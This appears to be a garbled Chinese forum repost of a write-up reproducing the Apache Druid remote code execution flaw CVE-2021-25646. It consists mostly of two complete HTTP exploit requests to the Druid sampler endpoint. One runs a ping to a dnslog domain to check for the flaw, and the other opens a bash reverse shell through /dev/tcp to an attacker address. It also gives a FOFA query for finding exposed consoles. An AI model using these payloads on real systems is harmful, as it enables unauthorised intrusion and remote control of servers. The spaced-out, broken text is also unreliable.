搜索

[732] 2021-02-02_ApacheDruid远程代码执行漏洞复现(CVE-2021-25646)

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-16
2021-02-02_ApacheDruid远程代码执行漏洞复现(CVE-2021-25646) A p a c h e   D r u i d     ( C V E - 2 0 2 1 - 2 5 6 4 6 )     b g b i n g   2 0 2 1 - 0 2 - 0 2 使 f o f a f o f a 便 使 e x p 使 d n s l o g b o d y = " A p a c h e   D r u i d   c o n s o l e " P O S T   / d r u i d / i n d e x e r / v 1 / s a m p l e r   H T T P / 1 . 1 C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n U s e r - A g e n t :   J a v a / 1 . 8 . 0 _ 2 1 1 H o s t :   1 9 2 . 1 6 8 . 1 . 1 9 8 : 8 8 8 8 A c c e p t :   t e x t / h t m l ,   i m a g e / g i f ,   i m a g e / j p e g ,   * ;   q = . 2 ,   * / * ;   q = . 2 C o n n e c t i o n :   k e e p - a l i v e C o n t e n t - L e n g t h :   1 0 0 5 { " t y p e " :   " i n d e x " ,   " s p e c " :   { " i o C o n f i g " :   { " t y p e " :   " i n d e x " ,   " i n p u t S o u r c e " :   { " t y p e " :   " i n l i n e " ,   " d a t a " :   " { " i s R o b o t " : t r u e , " c h a n n e l " : " # x " , " t i m e s t a m p " : " 2 0 2 1 - 1 2 - 1 2 T 1 2 : 1 0 : 2 1 . 0 4 0 Z " , " f l a g s " : " x " , " i s U n p a t r o l l e d " : f a l s e , " p a g e " : " 1 " , " d i f f U r l " : " h t t p s : / / w w w . b a i d u . c o m " , " a d d e d " : 1 , " c o m m e n t " : " B o t s k a p a n d e   I n d o n e s i e n   o m d i r i g e r i n g " , " c o m m e n t L e n g t h " : 3 5 , " i s N e w " : t r u e , " i s M i n o r " : f a l s e , " d e l t a " : 3 1 , " i s A n o n y m o u s " : t r u e , " u s e r " : " L s j b o t " , " d e l t a B u c k e t " : 0 , " d e l e t e d " : 0 , " n a m e s p a c e " : " M a i n " } " } ,   " i n p u t F o r m a t " :   { " t y p e " :   " j s o n " ,   " k e e p N u l l C o l u m n s " :   " t r u e " } } ,   " d a t a S c h e m a " :   { " d a t a S o u r c e " :   " s a m p l e " ,   " t i m e s t a m p S p e c " :   { " c o l u m n " :   " t i m e s t a m p " ,   " f o r m a t " :   " i s o " } ,   " d i m e n s i o n s S p e c " :   { } ,   " t r a n s f o r m S p e c " :   { " t r a n s f o r m s " :   [ ] ,   " f i l t e r " :   { " t y p e " :   " j a v a s c r i p t " ,   " d i m e n s i o n " :   " a d d e d " ,   " f u n c t i o n " :   " f u n c t i o n ( v a l u e )   { j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( ' p i n g   3 r g l k x . d n s l o g . c n ' ) } " ,   " " :   { " e n a b l e d " :   " t r u e " } } } } ,   " t y p e " :   " i n d e x " ,   " t u n i n g C o n f i g " :   { " t y p e " :   " i n d e x " } } ,   " s a m p l e r C o n f i g " :   { " n u m R o w s " :   5 0 0 ,   " t i m e o u t M s " :   1 5 0 0 0 } }
s h e l l s h e l l P O S T   / d r u i d / i n d e x e r / v 1 / s a m p l e r   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 . 1 9 8 : 8 8 8 8 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 1 6 ;   r v : 8 5 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 5 . 0 A c c e p t :   a p p l i c a t i o n / j s o n ,   t e x t / p l a i n ,   * / * A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n C o n t e n t - L e n g t h :   1 0 4 8 C o n n e c t i o n :   c l o s e { " t y p e " :   " i n d e x " ,   " s p e c " :   { " i o C o n f i g " :   { " t y p e " :   " i n d e x " ,   " i n p u t S o u r c e " :   { " t y p e " :   " i n l i n e " ,   " d a t a " :   " { " i s R o b o t " : t r u e , " c h a n n e l " : " # x " , " t i m e s t a m p " : " 2 0 2 0 - 1 2 - 1 2 T 1 2 : 1 0 : 2 1 . 0 4 0 Z " , " f l a g s " : " x " , " i s U n p a t r o l l e d " : f a l s e , " p a g e " : " 1 " , " d i f f U r l " : " h t t p s : / / x x x . c o m " , " a d d e d " : 1 , " c o m m e n t " : " B o t s k a p a n d e   I n d o n e s i e n   o m d i r i g e r i n g " , " c o m m e n t L e n g t h " : 3 5 , " i s N e w " : t r u e , " i s M i n o r " : f a l s e , " d e l t a " : 3 1 , " i s A n o n y m o u s " : t r u e , " u s e r " : " L s j b o t " , " d e l t a B u c k e t " : 0 , " d e l e t e d " : 0 , " n a m e s p a c e " : " M a i n " } " } ,   " i n p u t F o r m a t " :   { " t y p e " :   " j s o n " ,   " k e e p N u l l C o l u m n s " :   t r u e } } ,   " d a t a S c h e m a " :   { " d a t a S o u r c e " :   " s a m p l e " ,   " t i m e s t a m p S p e c " :   { " c o l u m n " :   " t i m e s t a m p " ,   " f o r m a t " :   " i s o " } ,   " d i m e n s i o n s S p e c " :   { } ,   " t r a n s f o r m S p e c " :   { " t r a n s f o r m s " :   [ ] ,   " f i l t e r " :   { " t y p e " :   " j a v a s c r i p t " ,   " d i m e n s i o n " :   " a d d e d " ,   " f u n c t i o n " :   " f u n c t i o n ( v a l u e )   { j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( ' / b i n / b a s h   - c   $ @ | b a s h   0   e c h o   b a s h   - i   > & / d e v / t c p / 1 9 2 . 1 6 8 . 1 . 1 9 8 / 2 3 3 3 3   0 > & 1 ' ) } " ,   " " :   { " e n a b l e d " :   t r u e } } } } ,   " t y p e " :   " i n d e x " ,   " t u n i n g C o n f i g " :   { " t y p e " :   " i n d e x " } } ,   " s a m p l e r C o n f i g " :   { " n u m R o w s " :   5 0 0 ,   " t i m e o u t M s " :   1 5 0 0 0 } }
D r u i d   D r u i d     O L A P     D r u i d     O L A P   D r u i d     D r u i d   s h a r e d - n o t h i n g   P B c o u n t     s u m 使   j a v a s c r i p t     U D F   A g g r e g a t o r   A g g r e g a t o r     H y p e r L o g l o g     Y a h o o     D a t a S k e t c h e s G r o u p b y S e l e c t S e a r c h J o i n   l o o k u p     J o i n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理